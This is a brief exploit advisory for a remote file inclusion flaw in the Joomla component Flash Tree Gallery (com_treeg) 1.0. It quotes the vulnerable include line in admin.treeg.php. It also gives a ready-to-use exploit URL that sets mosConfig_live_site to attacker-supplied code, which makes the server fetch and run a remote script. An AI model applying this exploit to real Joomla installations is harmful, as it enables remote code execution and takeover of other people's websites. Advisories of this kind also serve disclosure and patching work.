Flash Tree Gallery 1.0 - RFI

[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


[o] Vulnerable file
administrator/components/com_treeg/admin.treeg.php
include( "$mosConfig_live_site/components/com_treeg/about.html" );


[o] Exploit
http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]